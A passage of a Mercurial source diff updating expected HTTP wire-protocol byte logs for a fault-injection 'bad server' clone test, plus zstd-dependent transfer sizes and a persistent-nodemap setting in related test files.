from 35) -> (72) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (63) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - sendall(45 from 45) -> (18) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -20 + sendall(9 from 9) -> (744) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (735) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + sendall(47 from 47) -> (688) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) + sendall(9 from 9) -> (679) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + sendall(473 from 473) -> (206) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (197) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (188) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + sendall(38 from 38) -> (150) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + sendall(9 from 9) -> (141) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + sendall(64 from 64) -> (77) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + sendall(9 from 9) -> (68) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (59) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + sendall(41 from 41) -> (18) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) sendall(9 from 9) -> (9) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) sendall(9 from 9) -> (0) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write limit reached; closing socket @@ -1193,25 +1188,20 @@ #else - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -26 - write(9 from 9) -> (851) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (842) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - write(47 from 47) -> (795) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - write(9 from 9) -> (786) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - write(473 from 473) -> (313) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (304) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (295) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - write(38 from 38) -> (257) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - write(9 from 9) -> (248) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - write(64 from 64) -> (184) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - write(9 from 9) -> (175) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (166) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - write(41 from 41) -> (125) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) - write(9 from 9) -> (116) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (107) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - write(35 from 35) -> (72) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - write(9 from 9) -> (63) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - write(45 from 45) -> (18) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -21 + write(9 from 9) -> (744) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (735) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + write(47 from 47) -> (688) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) + write(9 from 9) -> (679) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + write(473 from 473) -> (206) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (197) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (188) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + write(38 from 38) -> (150) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + write(9 from 9) -> (141) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + write(64 from 64) -> (77) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + write(9 from 9) -> (68) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (59) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + write(41 from 41) -> (18) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) write(9 from 9) -> (9) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write(9 from 9) -> (0) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write limit reached; closing socket @@ -1227,7 +1217,7 @@ Server sends a size 0 chunked-transfer size without terminating \r\n - $ hg serve --config badserver.closeaftersendbytes=1865 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1739 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1243,25 +1233,20 @@ $ killdaemons.py $DAEMON_PIDS #if py36 - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -26 - sendall(9 from 9) -> (854) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (845) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - sendall(47 from 47) -> (798) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - sendall(9 from 9) -> (789) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - sendall(473 from 473) -> (316) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (307) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (298) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - sendall(38 from 38) -> (260) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - sendall(9 from 9) -> (251) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - sendall(64 from 64) -> (187) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - sendall(9 from 9) -> (178) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (169) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - sendall(41 from 41) -> (128) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) - sendall(9 from 9) -> (119) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (110) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - sendall(35 from 35) -> (75) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (66) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - sendall(45 from 45) -> (21) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -21 + sendall(9 from 9) -> (747) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (738) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + sendall(47 from 47) -> (691) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) + sendall(9 from 9) -> (682) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + sendall(473 from 473) -> (209) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (200) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (191) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + sendall(38 from 38) -> (153) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + sendall(9 from 9) -> (144) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + sendall(64 from 64) -> (80) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + sendall(9 from 9) -> (71) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (62) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + sendall(41 from 41) -> (21) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) sendall(9 from 9) -> (12) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) sendall(9 from 9) -> (3) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) sendall(3 from 5) -> (0) 0\r\n @@ -1272,25 +1257,20 @@ #else - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -27 - write(9 from 9) -> (854) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (845) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - write(47 from 47) -> (798) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - write(9 from 9) -> (789) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - write(473 from 473) -> (316) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (307) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (298) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - write(38 from 38) -> (260) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - write(9 from 9) -> (251) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - write(64 from 64) -> (187) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - write(9 from 9) -> (178) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (169) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - write(41 from 41) -> (128) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) - write(9 from 9) -> (119) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (110) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - write(35 from 35) -> (75) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - write(9 from 9) -> (66) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - write(45 from 45) -> (21) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -22 + write(9 from 9) -> (747) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (738) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + write(47 from 47) -> (691) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) + write(9 from 9) -> (682) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + write(473 from 473) -> (209) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (200) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (191) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + write(38 from 38) -> (153) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + write(9 from 9) -> (144) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + write(64 from 64) -> (80) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + write(9 from 9) -> (71) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (62) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + write(41 from 41) -> (21) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) write(9 from 9) -> (12) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write(9 from 9) -> (3) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write(3 from 5) -> (0) 0\r\n diff --git a/tests/test-http-bundle1.t b/tests/test-http-bundle1.t --- a/tests/test-http-bundle1.t +++ b/tests/test-http-bundle1.t @@ -38,7 +38,8 @@ #if no-reposimplestore $ hg clone --stream http://localhost:$HGPORT/ copy 2>&1 streaming all changes - 6 files to transfer, 606 bytes of data + 6 files to transfer, 606 bytes of data (no-zstd !) + 6 files to transfer, 608 bytes of data (zstd !) transferred * bytes in * seconds (*/sec) (glob) searching for changes no changes found @@ -225,7 +226,8 @@ #if no-reposimplestore $ hg clone http://user:pass@localhost:$HGPORT2/ dest 2>&1 streaming all changes - 7 files to transfer, 916 bytes of data + 7 files to transfer, 916 bytes of data (no-zstd !) + 7 files to transfer, 919 bytes of data (zstd !) transferred * bytes in * seconds (*/sec) (glob) searching for changes no changes found diff --git a/tests/test-http-protocol.t b/tests/test-http-protocol.t --- a/tests/test-http-protocol.t +++ b/tests/test-http-protocol.t @@ -1,8 +1,13 @@ #require no-chg +persistent-nodemap is not enabled by default. It is not relevant for this test +so disable it. + $ . $TESTDIR/wireprotohelpers.sh $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no > [web] > push_ssl = false > allow_push = * @@ -321,7 +326,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> 